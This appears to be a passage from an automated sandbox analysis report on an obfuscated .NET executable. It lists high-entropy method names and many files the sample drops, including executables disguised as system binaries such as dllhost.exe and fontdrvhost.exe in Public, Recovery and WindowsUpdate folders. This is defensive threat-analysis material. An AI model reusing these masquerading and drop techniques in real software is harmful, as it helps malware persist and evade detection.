Source: eu6OEBpBCI.exe, Qbkb6ovLrVkr9eDlwjZ.cs	High entropy of concatenated method names: 'peJvTVmPok', 'tYpOYSPhlJOvuVERbJPu', 'uBhn9uPhHZgiUgE3psAs', 'O1rgYQPhfcD0ODQ3jEp4', 'LA6p2iPhU9Eo3kOjVmVF', 'eiRlK0PhA6sj9DGPywpp', 'UU8', 'd65', 'evaP5AoKAKc', 'M4oP5gDEIip'
Source: eu6OEBpBCI.exe, SDgon4H97T0Fmwh2mAC.cs	High entropy of concatenated method names: 'Yi3', 'hZpP4Jlex9I', 'CAKHm4Uys7', 'qyEP4mB8YDl', 'JvloLoP7A402OXw0NYiV', 'pJdMALP7gTENgSWU0MPW', 'brGEE7P7lSr4C64FjwZq', 'iStWuQP7UHtHtia7shUN', 'G0DQeUP7aPmqYAJUF8rw', 'NEZAWwP7eblIjAEWER1u'
Source: eu6OEBpBCI.exe, g2pCpYgxmKFuFSik1n4.cs	High entropy of concatenated method names: 'hOeaWski9V', 'F3WaPZJvmm', 'qvPaEHWy8O', 'ebKabputYs', 'K0ea5y7k56', 'wa035VPTDJ9psQmiAqxP', 'eonj2kPTV2P0Ac64iCR9', 'x2tOvGPT4lyrtHke25d8', 'TwBPBIPTv5Qgy2QbAieN', 'dwu6SCPTHKUHiGkEQxt3'
Source: eu6OEBpBCI.exe, ppBfSWw5DjTHnvjAL5S.cs	High entropy of concatenated method names: 'nL1wDuZ2pm', 'kdFwVXh7R3', 'Nq9w4BoJMG', 'sPvwv6NJeW', 'VHtwHPItpJ', 'OKFwfbhTwZ', 'zsbwlCsc70', 'CSGwUvUdbW', 'FFtwAwVipY', 'vxUwgQtjuM'
Source: eu6OEBpBCI.exe, j1pgEbJMVo0HgybQ0iV.cs	High entropy of concatenated method names: '_25r', 'h65', 'JexJOrFpWe', 'j6OJCAlvX8', 'TFJJQSot1U', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
Source: eu6OEBpBCI.exe, OnRduwyUSOCNKFrCxep.cs	High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'pHYP4GyRlhf', 'uKkPbzdrGJV', 'DjJALyPkvlUSWO60BcU4', 'xr0aJKPkHhv0otT08jxv', 'RnVDwaPkfQ5ADoE23YAP', 'N5JE87PklrS4VYRQLBLo', 'wUkhugPkUd90frDI6c3d'
Source: eu6OEBpBCI.exe, zxsZROf8H0GIXiJqsSB.cs	High entropy of concatenated method names: 'ymsUZaIiJw', 'sMiapnPpiq2fxtvOQWNo', 'TpV8ZRPprsrJWtwyhiCX', 'Cp0Rg5PpRWZh6nOvtiJP', 'aRvmH9Pp6Y00mgHtxfcJ', 'HjrfkiRGA4', 'E6Wf9BvIGq', 'oNZfJ2awq5', 'ptofmdCoSy', 'pf7fhubKeN'
Source: eu6OEBpBCI.exe, SCTQ8LHvdJFHjIdCOfr.cs	High entropy of concatenated method names: 'L91HARfvr7', 'DFof8uPhChDZB3mFw3bj', 'Hosp3IPh2KEttGSlRpXq', 'J2O6BBPhOHxnMX23fHXK', 'JgMRqlPhQYFvvmIUw2eW', '_53Y', 'd65', 'atYP5BOq3gF', 'HFOP5F00mhu', 'SWLP4ksceIN'
Source: eu6OEBpBCI.exe, NaECLitdr4YBDos8Ona.cs	High entropy of concatenated method names: 'oLdt9gFlJa', 'wJvtJOmlWR', 'KAmtmxVv7o', 'm29thHJlDI', 'fbwt7cOt9L', 'iOWtpmSxvN', 'ILHto6ZHMv', 'Rs9tTOCCql', 'uO9trHAvDS', 'TmHtRtybmh'
Source: eu6OEBpBCI.exe, zPVKICvi2KLstfIqquH.cs	High entropy of concatenated method names: 'IDV', 'd65', 'TAjP4XDMg8F', 'OrIP5W39OP3', 'ygovjCIUu2', 'nAoVTfPhaJXlAaTradVF', 'SxtwNtPheMkQBnpHajxJ', 'vrZiWyPhc2qjIDnF6Uaa', 'y0KDEOPh1OIIXjZIEhWC', 'rFs3lxPhZFmi3FBC91Bo'
Source: eu6OEBpBCI.exe, IGh4GefDHkQ1RlJURue.cs	High entropy of concatenated method names: 'H7QgSbPpUvPhF59RR4b3', 'DCfXCAPpAkvHdwrEeyOi', 'YRI0cXPpfo8U67f5gh3M', 'wrNNCXPpl1sudtGZaQ5P', '_7kT', '_376', 'trrf4qJKff', 'Mjxfv4JAUx', '_4p5', 'QPsfHgCeyn'
Source: eu6OEBpBCI.exe, FFLqXvwx8jjD6cF6Zvn.cs	High entropy of concatenated method names: 'tIKnESi5ls', 'H0GnblarkU', 'QcsjbyP0sbgwbAN6PWSb', 'V3L9FLP0MYAT78Ai9KCW', 'neY2cnP06kEMtjVD678m', 'lduetxP0jVpD3h4vqG3U', 'ylY9aTP025ZAbHb4EW3k', 'LmGeK0P0OT3sCl9BEs5n', 'UobnWbb421', 'iQQgcPP0rcEOMHm77EmZ'
Source: eu6OEBpBCI.exe, dDBX9RkDKFbPCVMDkt5.cs	High entropy of concatenated method names: 'HNyrtuPO2XZZCr4HWvv6', 'ExpLSuPOOKXxvGD65SFi', 'LxOSRAPOCx03JVVmT947', 'rnSk4GDwa3', '_1R8', '_3eK', 'AyXkvGXJwr', 'TBokHDnsQu', 'MFfkfRnqdp', 'tqEkl6BDyC'
Source: eu6OEBpBCI.exe, uFti0stidUcsW7SbF9L.cs	High entropy of concatenated method names: 'xuFPDM3EpyC', 'kgdPD2cAOdX', 'uBUPDOkjFcv', 'u8gPDC6WltL', 'DyLPDQpGYf5', 'UyFPDwclasF', 'n7lPDnmXcuu', 'rVZxvgTrPN', 'TT3PDIVF1hG', 'SK1PDYnOZYe'
Source: eu6OEBpBCI.exe, kmnjw9H6pmewMCn5Zuo.cs	High entropy of concatenated method names: '_34V', 'y7u', 'cgkP4p8sw4C', 'ySeHs2td0Y', 'gt1', 'wl5MLkP7XnmJixhuEGrK', 'UdZI7NP7KQuB78BC5wL2', 'ocvbXjP7qE37RbdBsKLY', 'qHvcpCP73BRQDIbsqTAn', 'jGID3aP78vB9XApPZGSv'
Source: eu6OEBpBCI.exe, vedbjqcuqD3s3XUcfxW.cs	High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
Source: eu6OEBpBCI.exe, tD2eMf9S8fyOk5vOoKy.cs	High entropy of concatenated method names: 'RVTJarLE2h', 'eTvsdnPCv3AXQ4l4lSWU', 'fJ7PYIPCVPGVwqpYxfFq', 'QmFdClPC4FtRgnqEtPVg', 'i5X', 'yva9FZTH5M', 'W93', 'L67', '_2PR', 'p6J'
Source: eu6OEBpBCI.exe, LUY4f03ojk7XJyLw3DH.cs	High entropy of concatenated method names: 'E8C3rJT6JJ', 'NRO3R5mqkF', 'Ara3iaGQkT', 'WWX36sKctF', 'rqG3jdmxW2', 'mBX3sibiS3', '_4tg', 'wk8', '_59a', '_914'
Source: eu6OEBpBCI.exe, cY2aQMLqkT9g4RD2VUJ.cs	High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
Source: eu6OEBpBCI.exe, mFns9peS5ws6LfHQVJR.cs	High entropy of concatenated method names: 'hccejHe7Da', 'RhyeFVRxaa', 'EVteupyGW2', 'WxFeKG1Bj3', 'oQ0eqo5wkJ', 'UtceXtJD1C', 'eNLe3piWUy', 'Obde8pxobL', 'zQoeLp2CZX', 'O6oek5RZiX'
Source: eu6OEBpBCI.exe, rIQS0j5TRfIsS4ajYoq.cs	High entropy of concatenated method names: 'gHi52tCnqQ', 'uvABmfPL6O6L3nQ7IkiC', 'CW4wMrPLRtnlebDsX0xe', 'IZ1ZhkPLi08UBn5MbDax', 'LyKMvbPLjrOxY6HfJhf8', 'Aky5RsfK7C', 'Y9K5iqWbMQ', 'pnT563ISsL', 'zQvhZbPLpJYf9ohn1gab', 'cP2DioPLonONxIiVEFLk'
Source: eu6OEBpBCI.exe, pwgeKube6rqpqlF8iUh.cs	High entropy of concatenated method names: 'mgrbXvNYOW', 'Nrpb3O0lDw', 'IbCb8TaNsZ', 'QWTSL5P8UVVZtidrudH4', 'IXqXVTP8A1ymUymr3If8', 'gRBMpFP8foE5UUdIFWoF', 'W9byO9P8lWU6hBlMlXOM', 'zUFbF6KOMh', 'YPdbuvH38C', 'K1AEqHP8vOOEY4Wfw6a9'
Source: eu6OEBpBCI.exe, jbiOwtEZ0PmZUMKjDYW.cs	High entropy of concatenated method names: 'kP0EGW0nJc', 'O1yEdbyXTA', 'LC28ZkP35ObmVecsdnUE', 'w78YDOP3E2mNf3LORxB0', 'i5u3nRP3bSlsyNp6mmAw', 'nAaKdSP3yJ8Ki51vEihm', 'tFscuHP3DDr1FKWJOlIA', 'H9VT70P3VhNVNjkTCvXu', 'gLV0QqP34jMrFdlQJBk5'
Source: eu6OEBpBCI.exe, VWvqVh8beZRPUo0ZtFy.cs	High entropy of concatenated method names: 'z518yocABA', 'Rve8D9UxOh', '_7Bm', 'UYU8VYJcfw', 'A1W84W1Q5Y', 'L7T8vxFd0W', 'ioh8HeBXeQ', 'PlxUlnPM2kaO4kGCEUJM', 'v0QGR2PMs6naufyPl3pf', 'cDAjmBPMM2AxXZI7qsiV'
Source: eu6OEBpBCI.exe, gpkn78Sho9H4OicEUga.cs	High entropy of concatenated method names: 'D9PquLLsb0', 'jitqKy9VCc', 'yJ8ClWPjrjYITINAre2T', 'gfPcxNPjoFDC8IAgpPa4', 'gqhNkuPjTc629f0KPKOB', 'lfjqkYS9O7', 'LQYdo5PjjsDYQC5OcRxx', 'PWfuocPjid3RNXTvHItV', 'F1qYhGPj6lZ72GAlqGUb', 'YWuBcOPjsF0KCs22luOt'
Source: eu6OEBpBCI.exe, I27SNhEijtMsLEGASf5.cs	High entropy of concatenated method names: 'dktEtXhFZS', 'ESYExt3A6J', 'VP8Ezk9lmc', 'BCSeE9P3oMwPwDqDDaH4', 'ITYjxAP3TnvSGcdv98He', 'y6qqTSP37o9fLrs2pqfj', 'PmBdavP3psAi2GDjXnsy', 'tArby3wXTN', 'otjPC6P3RV1YIgfoG24H', 'UneEJeP3iKvoC3HVmroX'
Source: eu6OEBpBCI.exe, BikF5GnlC6PkZuIshFX.cs	High entropy of concatenated method names: 'X9GnAjetRm', 'VadngqdeSa', 'FDFnaWAh7B', 'zjFneNioVh', 'Un6ncLGgk2', 'zBcn1grLb4', 'ek2ruxP0tOTLHxd9rxuo', 'ySBJJEP0xPXxXR5ryJbl', 'qEQVpYP0zjhLoQFxINvB', 'hueL54PtWhIQAaThH5Pf'
Source: eu6OEBpBCI.exe, J7Uu5SVB6Ka349SqFLr.cs	High entropy of concatenated method names: 'TVEV8nTnLw', 'm6gp1bPJNx2bm07nsxBu', 'o7K0C4PJG10wkGwKEBIp', 'pr3MJ0PJ1ytD3iaHkkkN', 'UuySeXPJZtRfFHtn67lq', 'kAbpTrPJdTQwcFZP3fw0', 'pCaVu3hm3Z', 'j3Rk3fPJgFdauj0odqFO', 'BZM5RrPJUFhcVdqMeMcb', 'tBv68bPJA28jCgRdCLUw'
Source: eu6OEBpBCI.exe, IhqBvpCYCTLrnXIgPdG.cs	High entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'iHyCtCnvS1', 'd17CxfEXjU', 'TO5CzYGVXi', '_0023Nn', 'Dispose', 'ucFsw1PYWUWht7LQyoF7', 'OMURldPYP6vQWk8jfIxK'
Source: eu6OEBpBCI.exe, PoTOUILWQVR7vitxPcg.cs	High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
Source: eu6OEBpBCI.exe, dwiniWysTI5SjSeN12n.cs	High entropy of concatenated method names: 's3Yy08jdq3', 'bduytPU9ZV', 'MCAXh2PkRFKgki1kvErr', 'MvYfeiPkTEncwtY32423', 'VhUuvEPkrgngSBksidZm', 'jUCdk0PkiSoKxuXvW5xv', 'kdEDPl3F44', 'pjn109PkMV7KdM5PYEJB', 'GeFg5RPk2Cng6d5RmW05', 'NqUP0PPkjwbahtGHDIAS'
Source: eu6OEBpBCI.exe, u0tFAVcwGsV8Casjlt6.cs	High entropy of concatenated method names: 'tGKA9pPiOJCtUI3n1sXI', 'VMXh9TPiMIp6fiSZZ3Vb', 'BcLS9OPi2cjn30IlAlCk', 'cUNfUaPiC0XCDfyRAOew', 'kY8SuRDRHV', 'DH5CISPiI225V7KTSvmn', 'J3KIDEPiwUQkIOgrU9HW', 'tOue89PinFVhPjFFCH3H', 'dhS0nlPiYp2fMhKIuicr', 'ofcsbBPi068wofkpwIBy'
Source: eu6OEBpBCI.exe, dGJ3Uc3GtbZ4JsFCh0W.cs	High entropy of concatenated method names: 'K2x3SPw8NL', 'JY93B8LqXq', 'M62', '_1Xu', 'LuR', '_4p3', 'HVh', 'UMq3FlMlQJ', '_96S', '_9s5'
Source: eu6OEBpBCI.exe, hDDSBRCLE82hayRQ2k8.cs	High entropy of concatenated method names: 'ToWCJ2KBS2', 'P4NCp1SABL', 'ifcCrAvdQm', 'vtRCRI8X5p', 'Ji9CioBeMs', 'rCpC6dkmph', 'rKbCjo9ue4', 'wRPCsGkjQy', '_0023Nn', 'Dispose'
Source: eu6OEBpBCI.exe, QRTv86XH93JGZRBWb2r.cs	High entropy of concatenated method names: 'tT7Xl6AgHU', 'ffuXULcnsm', 'CUGXA4IaXo', 'GL9DZAPslMFmprSYmlnB', 'tJCjNXPsU6OgIqyTatbF', 'eSl2SnPsAr5DpH5MHlGD', 'ljv0wHPsg2Tsl3BsAjA0', 'm87LSaPsaNh3N8wiWuh5', 'NUWLufPseuf2D81JQCCC'
Source: eu6OEBpBCI.exe, i4CaIDaz2I7YOkvnQq1.cs	High entropy of concatenated method names: '_26K', '_1U7', '_5gR', '_58D', 'H8v', 'e7rePHsGFD', 'zc3eEJux0Z', 'gY2', 'rV4', '_28E'
Source: eu6OEBpBCI.exe, N2QcsvPTACMmTWys0lo.cs	High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'Uo9P4ckDTny', 'UtKPbOSQlN3', 'NcbKFXPXlHrriEXytv1w', 'HQNgWNPXUULcaNXJ82cM', 'TEsO9kPXAgyrBYcb2kok'
Source: eu6OEBpBCI.exe, Iu1DdGLkta3RD7P6DUr.cs	High entropy of concatenated method names: 'dAlLJ1j4XV', 'k0NLmoTPSH', 'CltLh6OPE6', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'sVkL7i6aS6'
Source: eu6OEBpBCI.exe, d2e9iOHawljfFdItjGh.cs	High entropy of concatenated method names: '_5t1', 'd65', 'CIaP5KUnKUU', 'QAWP5qar8jo', 'OIPHcdp9QF', 'f6PP490V9Yf', 'OrIP5W39OP3', 'n472hVPhn57kRs01bgCW', 'MEufMfPhI41GvU2AWGUO', 'fj4wDtPhYDSXNTgcxgFR'
Source: eu6OEBpBCI.exe, bPdJ5DbmvH13WV8pZ3a.cs	High entropy of concatenated method names: 'nAMb7Hci6B', 'nIlbpxSwYo', 'VQDboaRVgE', 'sStbTSYVRs', 'kuSbrXQIVw', 'igYbRgk3l7', 'JhbbiFlRXK', 'RVhb61YInr', 'UetbjGux8p', 'kKJbsPTPe8'
Source: eu6OEBpBCI.exe, QXAkCaYGvsDfCLsBuBN.cs	High entropy of concatenated method names: 'Kw2ZlgPtJqIFhatiSeJG', 'DdJ9dTPtm9HIVuXXelAX', 'WdC000AK8F', 'KSpkgdPtor0IjFA8YIZp', 'jEV5BCPtTnWJt99I0UoI', 'SnCHNrPtr7HRypliOmND', 'e3tx9YPtR8tvoqCWCHjo', 'xEu7euPtiklw1xMQBmqL', 'anBUAkPt6uCXY5BvU6DA', 'PRMUtbPtjpyRIgxRV6Ou'
Source: eu6OEBpBCI.exe, iCjoGoXgW2My3jKSn1D.cs	High entropy of concatenated method names: 'sKZXeq5inx', 'wTKXc4p849', 'YlTX18S8OD', 'mBjFIiPsNd5Qh7f9cWyB', 'tKiX0XPs1nsOtJaw3KtO', 'bWQNB6PsZDHWQoQQQHk8', 'MrkdkBPsGyveCVnpJxL9', 'ynt73yPsd0Coqcf8HI4H', 'VBVMFoPsSwIVB7o5Ktau'
Source: eu6OEBpBCI.exe, C0prLubnecMi4fwM5VX.cs	High entropy of concatenated method names: 'K6ybY1kk5Y', 'pP4sX4P8htDYYEhHGRia', 'dUgdLuP87SLPlhdBMwOr', 'Rcj3mUP8pU9aB4EIisxB', 'TcHgJiP8ogvGqh4QXxdl', 'jCf7gpP8TJ41OwT5mwug', 'X1XVSYP8JhyEWic8rIsR', 'h1i5M7P8mFDgDVG1UN1x', 'UD8fZcP8rIqYk81FxPMR'
Source: eu6OEBpBCI.exe, t3ZPsDEasGSnZH9cnhF.cs	High entropy of concatenated method names: 'yoXEcB7MEd', 'gn9E1pU26c', 'CELX4vPXYLGuwh9yg1c6', 'WxipkxPXnlRe6ZQkk9TM', 'Hs476RPXI6d8EfwUYgfk', 'AK2VkKPX0nwunsaneo15', 'yDKxxXPXtqY1X4DHBnkt', 'Vhc4RIPXxgp0fd57Ngog', 'lFQoPIPXzlGhAZnekSGS', 'eFIWEiP3WK780dfJUcYZ'

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\RGKyyyvv.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\PTahnXzX.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\uOjtiFsK.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\gsyeVgYo.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\AHMSLlxy.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\Public\Libraries\dllhost.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\FCNjSRns.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\iObdSlbK.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\sVUKwIHM.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\jzvnrySk.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\ypXSetlg.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\GzproQCn.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\sOBLQjau.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\PVfhrllC.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\VVaGAqXJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\wnljJKgl.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\kfPdycnc.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\TYzyfqIO.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\tCFTCxVs.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\hiGnLHFR.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\ygASuHSj.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\YwOfwePf.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\ZRcXHVNC.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\IYriOWqO.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\DOJbgDru.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\WJeOmDSH.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\QiIHXtHV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\bYXvUFHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Recovery\fontdrvhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\hZjnbUmV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\FdoRXWMY.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\UJxgUhAr.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\FnLRHIfV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Program Files\7-Zip\Lang\aVIegkftDeblliEdgtUahRSaMtI.exe	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\KpfivNCg.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\XxiWXROF.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\eEtWkScq.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\HpyAdrkQ.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\tRHlMFdP.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\lQNLnUfF.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\onNmUvhY.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\QALqtMNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\haXUgXfM.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Program Files (x86)\MSECache\OfficeKMS\win8\aVIegkftDeblliEdgtUahRSaMtI.exe	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\vEsBXgan.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\MRnySouc.log	Jump to dropped file

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe

File created: C:\Windows\Logs\WindowsUpdate\aVIegkftDeblliEdgtUahRSaMtI.exe

Jump to dropped file

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\RGKyyyvv.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\IYriOWqO.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\ypXSetlg.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\hiGnLHFR.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\PVfhrllC.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\FnLRHIfV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\vEsBXgan.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\lQNLnUfF.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\UJxgUhAr.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\sOBLQjau.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\QALqtMNE.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\ygASuHSj.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\hZjnbUmV.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\FdoRXWMY.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\bYXvUFHb.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\wnljJKgl.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\tCFTCxVs.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\iObdSlbK.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\haXUgXfM.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\YwOfwePf.log	Jump to dropped file
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	File created: C:\Users\user\Desktop\HpyAdrkQ.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\MRnySouc.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\XxiWXROF.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\PTahnXzX.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\tRHlMFdP.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\gsyeVgYo.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\WJeOmDSH.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\FCNjSRns.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\uOjtiFsK.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\kfPdycnc.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\TYzyfqIO.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\KpfivNCg.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\AHMSLlxy.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\jzvnrySk.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\ZRcXHVNC.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\QiIHXtHV.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\GzproQCn.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\onNmUvhY.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\eEtWkScq.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\VVaGAqXJ.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\DOJbgDru.log	Jump to dropped file
Source: C:\Users\Public\Libraries\dllhost.exe	File created: C:\Users\user\Desktop\sVUKwIHM.log	Jump to dropped file

Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eu6OEBpBCI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
